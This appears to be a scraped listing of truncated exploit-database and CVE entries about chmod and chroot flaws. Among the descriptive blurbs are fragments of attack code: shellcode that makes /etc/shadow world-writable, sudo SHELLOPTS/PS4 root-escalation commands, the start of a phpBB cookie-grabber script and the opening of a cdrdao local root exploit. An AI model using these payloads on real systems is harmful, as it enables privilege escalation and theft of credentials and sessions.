Serv-U FTP site chmod buffer overflow

Added: 07/17/2006 CVE: CVE-2004-2111 BID: 9675 OSVDB: 3713 Background Serv-U is an FTP server for Windows platforms. Problem An attacker who has logged on to the Serv-U FTP server and has a writable directory could execute arbitrary commands by sending a site chmod command with an overly long fil...

Serv-U FTP site chmod buffer overflow

Added: 07/17/2006 CVE: CVE-2004-2111 BID: 9675 OSVDB: 3713 Background Serv-U is an FTP server for Windows platforms. Problem An attacker who has logged on to the Serv-U FTP server and has a writable directory could execute arbitrary commands by sending a site chmod command with an overly long fil...

Exploit Labs Security Advisory 2006.4

EXPL-A-2006-004 exploitlabs.com Advisory 049 - - phpFormGenerator - AFFECTED PRODUCTS ================= phpFormGenerator v2.09 http://phpformgen.sourceforge.net/ OVERVIEW ======== phpFormGenerator is an easy-to-use tool to create reliable and efficient web forms in a snap. No programming of any...

CVE-2006-0640

Orbicule Undercover allows attackers with physical or root access to disable the protection by using the chmod command to change the permissions of the /private/etc/uc.app/Contents/MacOS/uc file, which prevents the service from being started in LaunchDaemon...

linux/x86 chmod(/etc/shadow 0666) + exit() 32 bytes

No description provided by source. / linux/x86 chmod"/etc/shadow", 0666 + exit - 32 bytes - izik [email protected] / char shellcode = "\x6a\x0f" // push $0xf "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x66\xb9\xb6\x01" // mov $0x1b6,%cx "\x68\x61\x64\x6f\x77" // push...

linux/x86 chmod(/etc/shadow, 0666) + exit() 32 bytes

Exploit for linux/x86 platform in category shellcode ==================================================== linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes ==================================================== / linux/x86 chmod"/etc/shadow", 0666 + exit - 32 bytes - izik / char shellcode = "\x6a\x0...

linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes

linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes. Shellcode exploit for linx86 platform / linux/x86 chmod"/etc/shadow", 0666 + exit - 32 bytes - izik / char shellcode = "\x6a\x0f" // push $0xf "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x66\xb9\xb6\x01" // mov $0x1b6,%cx...

CVE-2005-3765

Exponent CMS 0.96.3 and later versions performs a chmod on uploaded files to give them execute permissions, which allows remote attackers to execute arbitrary code...

linux/x86 read0,buf,2541; chmodbuf,4755; 23 bytes

linux/x86 read0,buf,2541; chmodbuf,4755; 23 bytes. Shellcode exploit for linx86 platform / readnchmod-core.c by Charles Stevenson Example of strace output if you pass in "/bin/sh\x00" read0, "/bin/sh\0", 2541 = 8 chmod"/bin/sh", 04755 = 0 Any file path can be given. For example: /tmp/.sneakyguy T...

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...

linux/x86 examples of long-term payloads hide-wait-change 187 bytes+

linux/x86 examples of long-term payloads hide-wait-change 187 bytes+. Shellcode exploit for linx86 platform /---------------------------------------------------------------------------- Mystique Project: Examples of long-term payloads hide-wait-change code by [email protected] & [email protected]...

linux/x86 examples of long-term payloads hide-wait-change 187 bytes+

No description provided by source. /---------------------------------------------------------------------------- Mystique Project: Examples of long-term payloads hide-wait-change code by [email protected] & [email protected] ----------------------------------------------------------------------------...

linux/x86 examples of long-term payloads hide-wait-change 187 bytes+

Exploit for linux/x86 platform in category shellcode ==================================================================== linux/x86 examples of long-term payloads hide-wait-change 187 bytes+ ====================================================================...

phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)

phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure Cookie Grabber // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.p...

linux/x86 chroot & standart 66 bytes

No description provided by source. Linux/x86 chroot and standart shellcode. By Okti http://okti.nm.ru ---------------------------------------------------------------------------------------------- / Mkdir and Chroot are written in C: / includestdio.h includeunistd.h includesys/types.h...

CVE-2004-2073

Linux-VServer 1.24 allows local users with root privileges on a virtual server to gain access to the filesystem outside the virtual server via a modified chroot-again exploit using the chmod command...

CVE-2004-2073

Technical details beyond the initial description are not provided in the connected documents; monitor for updates.

cdrdao (Mandrake 10.2) - Local Privilege Escalation

cdrdao Mandrake 10.2 - Local Privilege Escalation !/bin/sh cdrdao local root exploit newbug at chroot.org IRC: irc.chroot.org chroot May 2005 echo "cdrdao private exploit" echo "This exploit only for Mandrake series" echo "newbug at chroot.org" echo "May 2005" echo "checking if cdrdao is setuid...

CVE-2004-1604

CVE-2004-1604 affects cPanel 9.9.1-RELEASE-3. Affected component: the Front Page extensions workflow creates a _private directory; a symlink attack allows remote authenticated users to modify permissions (chmod) on arbitrary files via that directory. Underlying cause: symlink-related path travers...

1. Exploit for Cutenews 1.3 1.3.1 1.3.2, AND Bug in Cutenews v1.3.6

Cutenews v1.3 v1.3.1 v1.3.2 Shell exploit 2. bug-traq :: Cutenews 1.3.6 Shell Network security team nst.e-nex.com Title: shell in Cutenews 1.3.6 Bug found by: тёмыч Date: 7.09.2004 web: http://cutephp.com/ Бага работает толька в v1.3.6 Все ваши дальнейшие скрипты должны быть на хостинге каторый...